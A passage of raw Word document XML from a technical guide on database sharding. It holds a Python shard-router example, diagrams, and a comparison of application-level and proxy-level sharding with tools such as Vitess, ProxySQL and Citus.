      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704349C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      │   │   │   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60718180" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81E63C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   [Shard 0] [Shard 1] [Shard 2] [Shard 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6A8AB9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application determines which shard to query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4158D005" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731308D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>class ShardRouter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052057CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    def __init__(self, shard_connections, num_shards):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D557B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        self.connections = shard_connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47931E89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        self.num_shards = num_shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72074ECD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D66F0EE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    def get_shard(self, user_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1135A804" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        shard_idx = hash(user_id) % self.num_shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B54DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        return self.connections[shard_idx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60732043" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA987DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    def query_user(self, user_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD840B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        shard = self.get_shard(user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F8FA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        return shard.execute("SELECT * FROM users WHERE id = ?", user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B461A96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76B326" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    def query_all_shards(self, query):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C39DA8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        # Scatter-gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284229B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        results = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72304F59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        for shard in self.connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42610EA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">            results.extend(shard.execute(query))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B15B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        return results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD2EE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC2AF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>No middleware latency (direct connection to shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008BBD6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Full flexibility (application knows exactly which shard to use).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B01D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>No additional infrastructure to manage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1922941D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98CB70" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1563"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Sharding logic coupled to application code (hard to change strategy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C17CA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1563"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Every service/language needs its own routing implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7DAE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1563"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Resharding requires application code changes + deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5874A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Proxy-Level Sharding (Middleware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5404A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42CA7E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335EFF1E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│    Application      │  ← Application thinks it's talking to one database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DF657" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B905CA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EF524" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F3FB2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B4C6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   Sharding Proxy    │  ← Proxy handles routing transparently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BFFDB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  (Vitess, ProxySQL, │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08752296" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│   ShardingSphere)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC8473" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31ECD8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      │   │   │   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557F5BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AE9EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   [Shard 0] [Shard 1] [Shard 2] [Shard 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286C8DD3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789ACFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Application sends a normal SQL query to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE8835" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Proxy parses the query, extracts the shard key from WHERE clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C1D5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Proxy routes to the correct shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F56E5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Proxy returns results to application (transparently).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F356E6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy examples: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63"/>
        <w:gridCol w:w="1596"/>
        <w:gridCol w:w="5291"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7A70B8B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DA2043" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Proxy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14B448" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Database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55176F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="64304E2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6C2C6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Vitess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F18F3E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>MySQL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110D18" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Google-scale, online resharding, connection pooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="681F641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33E2F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>ProxySQL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964C82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>MySQL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01F4F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Query routing, caching, connection multiplexing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4D8434E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50E28A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Citus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0F837B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>PostgreSQL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33B3C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Distributed queries, auto-sharding, columnar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5253AAB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ED6AF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>ShardingSphere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2C52CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Any JDBC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71659B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Java ecosystem, multiple sharding strategies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2F01937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C86220" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>PgBouncer + custom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69624F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>PostgreSQL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ED2DC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Connection pooling (limited routing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A831F35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351326F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Application is unaware of sharding (transparent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08A1AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Centralized routing logic (one place to change).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2EF2B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Can handle cross-shard queries (proxy does scatter-gather).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77213468" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1565"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Handles connection pooling per shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE47E54" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF42CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Added latency (extra network hop through proxy).</w:t>
